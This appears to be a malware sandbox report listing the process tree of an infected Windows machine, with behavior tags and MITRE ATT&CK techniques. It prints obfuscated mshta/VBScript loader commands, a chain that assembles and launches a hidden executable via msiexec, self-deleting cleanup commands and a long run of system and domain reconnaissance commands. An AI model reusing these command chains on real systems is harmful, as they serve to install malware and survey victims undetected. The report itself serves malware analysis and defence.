        "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
        11⤵
        
        PID:2628
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
        12⤵
        
        PID:2856
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )
        11⤵
        
        PID:864
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC
        12⤵
        
        PID:1076
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
        13⤵
        
        PID:2912
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" EcHo "
        13⤵
        
        PID:2700
        
        C:\Windows\SysWOW64\msiexec.exe
        
        msiexec -Y ..\lXQ2g.WC
        13⤵
        
        PID:3520
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        7⤵
        Executes dropped EXE
        
        PID:2556
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit
        8⤵
        
        PID:1960
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "setup.exe" /f
        9⤵
        Kills process with taskkill
        
        PID:2256
        
        C:\Users\Admin\AppData\Local\Temp\chenxiulan-game.exe
        
        "C:\Users\Admin\AppData\Local\Temp\chenxiulan-game.exe"
        7⤵
        Executes dropped EXE
        
        PID:984
        
        C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"
        7⤵
        Executes dropped EXE
        
        PID:2160
        
        C:\Users\Admin\AppData\Local\Temp\6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\6.exe"
        7⤵
        Executes dropped EXE
        Modifies system certificate store
        Suspicious use of AdjustPrivilegeToken
        
        PID:2652
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 2652 -s 1352
        8⤵
        Program crash
        Suspicious behavior: GetForegroundWindowSpam
        
        PID:852
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Sun0328255c4bce6fb.exe
      4⤵
      PID:1844
    - - C:\Users\Admin\AppData\Local\Temp\7zS04258146\Sun0328255c4bce6fb.exe
        
        Sun0328255c4bce6fb.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2744

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-99026773011823104011722957388-1440518514-1533289414-1413565210-1750314133461111724"
1⤵
PID:1500

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1832731902-538583256-1707051891-1117749574-631165927-247982650-2100462954-1884419546"
1⤵
PID:1880

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-963943716-1374823605-478939998-713769614-9259980564466799881355109208-1717160287"
1⤵
PID:2680

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
1⤵
- Executes dropped EXE
PID:2884

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1013980756-2105234979161599050-411971027547896592-768346542953308588-1657355711"
1⤵
PID:2700

C:\Users\Admin\AppData\Local\Temp\492D.exe
C:\Users\Admin\AppData\Local\Temp\492D.exe
1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3652

C:\Windows\system32\taskeng.exe
taskeng.exe {1E21AA93-A969-4336-B06D-A0A70A980497} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
1⤵
- Executes dropped EXE
PID:2472
- C:\Users\Admin\AppData\Roaming\idbdcff
  C:\Users\Admin\AppData\Roaming\idbdcff
  2⤵
  - Executes dropped EXE
  PID:4076
- C:\Users\Admin\AppData\Roaming\tsbdcff
  C:\Users\Admin\AppData\Roaming\tsbdcff
  2⤵
  - Executes dropped EXE
  PID:2724
- C:\Users\Admin\AppData\Roaming\idbdcff
  C:\Users\Admin\AppData\Roaming\idbdcff
  2⤵
  - Executes dropped EXE
  PID:2224
- C:\Users\Admin\AppData\Roaming\idbdcff
  C:\Users\Admin\AppData\Roaming\idbdcff
  2⤵
  PID:1152
- C:\Users\Admin\AppData\Roaming\idbdcff
  C:\Users\Admin\AppData\Roaming\idbdcff
  2⤵
  PID:4092

C:\Windows\system32\cmd.exe
cmd
1⤵
PID:2784
- C:\Windows\System32\Wbem\WMIC.exe
  wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
  2⤵
  PID:1032
- C:\Windows\System32\Wbem\WMIC.exe
  wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv
  2⤵
  PID:2884
- C:\Windows\System32\Wbem\WMIC.exe
  wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv
  2⤵
  PID:2760
- C:\Windows\System32\Wbem\WMIC.exe
  wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
  2⤵
  PID:2776
- C:\Windows\System32\Wbem\WMIC.exe
  wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv
  2⤵
  PID:1384
- C:\Windows\System32\Wbem\WMIC.exe
  wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv
  2⤵
  PID:3712
- C:\Windows\System32\Wbem\WMIC.exe
  wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
  2⤵
  PID:2076
- C:\Windows\System32\Wbem\WMIC.exe
  wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv
  2⤵
  PID:1748
- C:\Windows\System32\Wbem\WMIC.exe
  wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
  2⤵
  PID:2132
- C:\Windows\System32\Wbem\WMIC.exe
  wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv
  2⤵
  PID:3244
- C:\Windows\System32\Wbem\WMIC.exe
  wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv
  2⤵
  PID:484
- C:\Windows\System32\Wbem\WMIC.exe
  wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv
  2⤵
  PID:3692
- C:\Windows\System32\Wbem\WMIC.exe
  wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv
  2⤵
  PID:2816
- C:\Windows\System32\Wbem\WMIC.exe
  wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv
  2⤵
  PID:3700
- C:\Windows\system32\ipconfig.exe
  ipconfig /displaydns
  2⤵
  - Gathers network information
  PID:3872
- C:\Windows\system32\ROUTE.EXE
  route print
  2⤵
  PID:1620
- C:\Windows\system32\netsh.exe
  netsh firewall show state
  2⤵
  PID:3236
- C:\Windows\system32\systeminfo.exe
  systeminfo
  2⤵
  - Gathers system information
  PID:3720
- C:\Windows\system32\tasklist.exe
  tasklist /v
  2⤵
  - Enumerates processes with tasklist
  PID:2360
- C:\Windows\system32\net.exe
  net accounts /domain
  2⤵
  PID:3624
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 accounts /domain
    3⤵
    PID:3804
- C:\Windows\system32\net.exe
  net share
  2⤵
  PID:3692
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 share
    3⤵
    PID:2832
- C:\Windows\system32\net.exe
  net user
  2⤵
  PID:3776
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user
    3⤵
    PID:3840
- C:\Windows\system32\net.exe
  net user /domain
  2⤵
  PID:2448
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user /domain
    3⤵
    PID:3656
- C:\Windows\system32\net.exe
  net use
  2⤵
  PID:188
- C:\Windows\system32\net.exe
  net group
  2⤵
  PID:3976
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 group
    3⤵
    PID:3644
- C:\Windows\system32\net.exe
  net localgroup
  2⤵
  PID:2276
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 localgroup
    3⤵
    PID:3768
- C:\Windows\system32\NETSTAT.EXE
  netstat -r
  2⤵
  - Gathers network information
  PID:2536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Windows\system32\route.exe" print
    3⤵
    PID:3124
  - - C:\Windows\system32\ROUTE.EXE
      C:\Windows\system32\route.exe print
      4⤵
      PID:4092
- C:\Windows\system32\NETSTAT.EXE
  netstat -nao
  2⤵
  - Checks SCSI registry key(s)
  - Gathers network information
  - Suspicious behavior: MapViewOfSection
  PID:4076
- C:\Windows\system32\schtasks.exe
  schtasks /query
  2⤵
  PID:4084

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:3748

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:1608

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:660
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:660 CREDAT:275457 /prefetch:2
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:3756

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
PID:3180

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:2152

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:3252

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:2820

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:3980

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:2284

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:1728

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
- Suspicious behavior: MapViewOfSection
PID:2168

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
PID:4008
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6014f50,0x7fef6014f60,0x7fef6014f70
  2⤵
  PID:108
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1032,8656419395577803044,6924198121676767392,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1044 /prefetch:2
  2⤵
  PID:1596
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1032,8656419395577803044,6924198121676767392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1712 /prefetch:8
  2⤵
  PID:3616
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1032,8656419395577803044,6924198121676767392,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1428 /prefetch:8
  2⤵
  PID:2392
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1032,8656419395577803044,6924198121676767392,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2004 /prefetch:1
  2⤵
  PID:3712
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1032,8656419395577803044,6924198121676767392,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2016 /prefetch:1
  2⤵
  PID:3276
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1032,8656419395577803044,6924198121676767392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3188 /prefetch:8
  2⤵
  PID:2584
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1032,8656419395577803044,6924198121676767392,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2852 /prefetch:2
  2⤵
  PID:3632
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1032,8656419395577803044,6924198121676767392,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3000 /prefetch:1
  2⤵
  PID:3948
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1032,8656419395577803044,6924198121676767392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2524 /prefetch:8
  2⤵
  PID:4052
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1032,8656419395577803044,6924198121676767392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3380 /prefetch:8
  2⤵
  PID:2068
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1032,8656419395577803044,6924198121676767392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3752 /prefetch:8
  2⤵
  PID:1960
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1032,8656419395577803044,6924198121676767392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3852 /prefetch:8
  2⤵
  PID:3448
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1032,8656419395577803044,6924198121676767392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3304 /prefetch:8
  2⤵
  PID:2176
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1032,8656419395577803044,6924198121676767392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4020 /prefetch:8
  2⤵
  PID:3528
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1032,8656419395577803044,6924198121676767392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3284 /prefetch:8
  2⤵
  PID:3540
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1032,8656419395577803044,6924198121676767392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3288 /prefetch:8
  2⤵
  PID:3064
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1032,8656419395577803044,6924198121676767392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=912 /prefetch:8
  2⤵
  PID:188
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1032,8656419395577803044,6924198121676767392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3244 /prefetch:8
  2⤵
  PID:2028
- C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\setup.exe
  "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\setup.exe" --reenable-autoupdates --system-level
  2⤵
  PID:1244
- - C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\setup.exe
    "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x13c,0x140,0x144,0x110,0x148,0x13fa1a890,0x13fa1a8a0,0x13fa1a8b0
    3⤵
    PID:872
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1032,8656419395577803044,6924198121676767392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4252 /prefetch:8
  2⤵
  PID:1404
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1032,8656419395577803044,6924198121676767392,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4152 /prefetch:8
  2⤵
  PID:2544
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1032,8656419395577803044,6924198121676767392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3452 /prefetch:8
  2⤵
  PID:3236
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1032,8656419395577803044,6924198121676767392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3436 /prefetch:8
  2⤵
  PID:3596
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1032,8656419395577803044,6924198121676767392,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3392 /prefetch:8
  2⤵
  PID:3744
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1032,8656419395577803044,6924198121676767392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3660 /prefetch:8
  2⤵
  PID:2404
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1032,8656419395577803044,6924198121676767392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4180 /prefetch:8
  2⤵
  PID:2360
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1032,8656419395577803044,6924198121676767392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3672 /prefetch:8
  2⤵
  PID:1844
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1032,8656419395577803044,6924198121676767392,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4100 /prefetch:8
  2⤵
  PID:3688
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1032,8656419395577803044,6924198121676767392,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4144 /prefetch:1
  2⤵
  PID:2088
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1032,8656419395577803044,6924198121676767392,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4016 /prefetch:1
  2⤵
  PID:3024

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Disabling Security Tools

T1089

Install Root Certificate

T1130

Modify Registry

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

System Information Discovery